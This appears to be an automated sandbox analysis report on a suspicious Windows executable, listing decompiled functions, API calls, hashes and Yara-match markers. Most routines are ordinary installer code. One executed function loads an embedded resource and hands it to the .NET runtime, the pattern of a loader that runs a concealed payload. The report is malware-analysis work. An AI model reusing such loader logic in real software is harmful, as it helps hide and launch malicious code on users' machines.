                  • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Template Method Pattern Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                  • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 3248276644-823278215
                • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405192, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a87c = _t16;
							E00404B4E();
						}
						L11:
						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404ACE(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004041C7(0x413);
				return 0;
			}





                0x00405196
                0x004051a0
                0x004051bc
                0x004051de
                0x004051e1
                0x004051e7
                0x004051f1
                0x004051f2
                0x004051f4
                0x004051fa
                0x004051fa
                0x00405204
                0x00000000
                0x00405212
                0x004051c9
                0x00405201
                0x00405201
                0x00000000
                0x00405201
                0x004051d5
                0x004051d7
                0x00000000
                0x004051d7
                0x004051a6
                0x00000000
                0x00000000
                0x004051ad
                0x00000000

                APIs
                • IsWindowVisible.USER32(?), ref: 004051C1
                • CallWindowProcA.USER32 ref: 00405212
                  • Part of subcall function 004041C7: SendMessageA.USER32 ref: 004041D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405FDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                0x00405fec
                0x00405fee
                0x00406006
                0x0040600b
                0x00406010
                0x0040604d
                0x0040604d
                0x00406012
                0x00406024
                0x0040602f
                0x00406035
                0x0040603f
                0x00000000
                0x00000000
                0x0040603f
                0x00406052

                APIs
                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Cgrlcpdlsle,0042A070,?,?,?,00000002,Cgrlcpdlsle,?,00406293,80000002), ref: 00406024
                • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Cgrlcpdlsle,Cgrlcpdlsle,Cgrlcpdlsle,?,0042A070), ref: 0040602F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseQueryValue
                • String ID: Cgrlcpdlsle
                • API String ID: 3356406503-1075718742
                • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405796, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405796(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c098->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                0x0040579f
                0x004057bf
                0x004057c7
                0x004057cc
                0x00000000
                0x004057d2
                0x004057d6

                APIs
                Strings
                • Error launching installer, xrefs: 004057A9
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: Error launching installer
                • API String ID: 3712363035-66219284
                • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403875, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403875() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429854;
				_t3 = E0040385A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429854 =  *0x429854 & 0x00000000;
				return _t3;
			}







                0x00403876
                0x0040387e
                0x00403885
                0x00403888
                0x00403888
                0x0040388a
                0x0040388f
                0x00403896
                0x0040389c
                0x004038a0
                0x004038a1
                0x004038a9

                APIs
                • FreeLibrary.KERNEL32(?,7519FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                • GlobalFree.KERNEL32 ref: 00403896
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 1100898210-823278215
                • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405AD6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405AD6(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                0x00405ad7
                0x00405ae1
                0x00405ae3
                0x00405aea
                0x00405af2
                0x00000000
                0x00000000
                0x00000000
                0x00405af2
                0x00405af4
                0x00405af9

                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\bGf2H3tXGg.exe,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405ADC
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\bGf2H3tXGg.exe,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405AEA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-1246513382
                • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405BF5, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                0x00405c05
                0x00405c07
                0x00405c0a
                0x00405c36
                0x00405c0f
                0x00405c18
                0x00405c1d
                0x00405c28
                0x00405c2b
                0x00405c47
                0x00405c2d
                0x00405c34
                0x00000000
                0x00405c34
                0x00405c40
                0x00405c44
                0x00405c44
                0x00405c3e
                0x00000000

                APIs
                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: bGf2H3tXGg.exe PID: 204 Parent PID: 4656 bGf2H3tXGg.exeCOMMON

                Executed Functions

                Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                0x0040149f
                0x004014a5
                0x004014a9
                0x004014ec
                0x004014ee
                0x004014ee
                0x004014b7
                0x004014bb
                0x004014c7
                0x004014cd
                0x004014d3
                0x004014d8
                0x004014e0
                0x004014e0
                0x004014d8
                0x004014e6
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v4.0.30319
                • API String ID: 2372384083-3152434051
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                0x00401e22
                0x00401e28

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0225B6C0, Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32 ref: 0225B730
                • GetCurrentThread.KERNEL32 ref: 0225B76D
                • GetCurrentProcess.KERNEL32 ref: 0225B7AA
                • GetCurrentThreadId.KERNEL32 ref: 0225B803
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 1c488e92cdaf7fe93814caa941cba042d1a5633f63a876ee1804edc8f9a51775
                • Instruction ID: fc06f67bef88ab5cb916bd1802dd414bab84334b33555a052d753e7bae64213b
                • Opcode Fuzzy Hash: 1c488e92cdaf7fe93814caa941cba042d1a5633f63a876ee1804edc8f9a51775
                • Instruction Fuzzy Hash: AE5165B0A056898FDB10CFA9D9887EEBBF0EF49308F208499E419A7358D7349945CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0225B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32 ref: 0225B730
                • GetCurrentThread.KERNEL32 ref: 0225B76D
                • GetCurrentProcess.KERNEL32 ref: 0225B7AA
                • GetCurrentThreadId.KERNEL32 ref: 0225B803
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 40a9da823b5cfc2ce1bbb5c31f7ddcd0b26f879d6215b9b3a2b942be88eff024
                • Instruction ID: f3000e50d48e9ba45c08c03972acf544b1bd3f5b3bc895108b9f5915c2b75831
                • Opcode Fuzzy Hash: 40a9da823b5cfc2ce1bbb5c31f7ddcd0b26f879d6215b9b3a2b942be88eff024
                • Instruction Fuzzy Hash: 3A5144B0E016498FDB10CFA9D588BEEBBF0BB48308F20C459E419B7358D7749944CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                0x004055c5
                0x004055cf
                0x004055d3
                0x004055e4
                0x004055e8
                0x004055ed
                0x004055f3
                0x004055f8
                0x004055fd
                0x00405602
                0x00405609
                0x004055d5
                0x004055d5
                0x004055d5
                0x00405614

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free
                • String ID:
                • API String ID: 3328510275-0
                • Opcode ID: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                • Opcode Fuzzy Hash: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 022593E8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0225962E
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: f5f4f00eab3a14fd396489731da817df70e997d53a5355a03c9e58fa584fc805
                • Instruction ID: 3c512b7b29233c18ec246264d0a279feb057fd50dc06fe54cc3bfd985b19d2db
                • Opcode Fuzzy Hash: f5f4f00eab3a14fd396489731da817df70e997d53a5355a03c9e58fa584fc805
                • Instruction Fuzzy Hash: 84712470A10B158FDB64DFA9D44079ABBF6BF88304F008929D88ADBA54DB74E845CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0225FBEE, Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0225FD0A
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 0f54f65badeb71447749ae380e65bb8753d9770ce66aa426276359eb935f1702
                • Instruction ID: f0d50bfe4ba4c5a1e8b37ff43f535409440e8b83c41e8dff981e12f1718daee9
                • Opcode Fuzzy Hash: 0f54f65badeb71447749ae380e65bb8753d9770ce66aa426276359eb935f1702
                • Instruction Fuzzy Hash: CD51CEB1D103599FDF14CFA9C984ADEBBB1FF89304F24812AE819AB214D7749945CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0225FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0225FD0A
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 3c4d0fbb3cbc8410bdd42afd764ba6c78fd6e62d26ae5b876b3e344d185fb4ed
                • Instruction ID: 72bc1fb9aa9805ca7af5fa7cba6271024394517b32da59fc7efd583a4b573da3
                • Opcode Fuzzy Hash: 3c4d0fbb3cbc8410bdd42afd764ba6c78fd6e62d26ae5b876b3e344d185fb4ed
                • Instruction Fuzzy Hash: E441DEB1D103199FDF14CFAAC984ADEBBB5BF48304F24812AE819AB214D7749845CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0225BCF8, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0225BD87
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
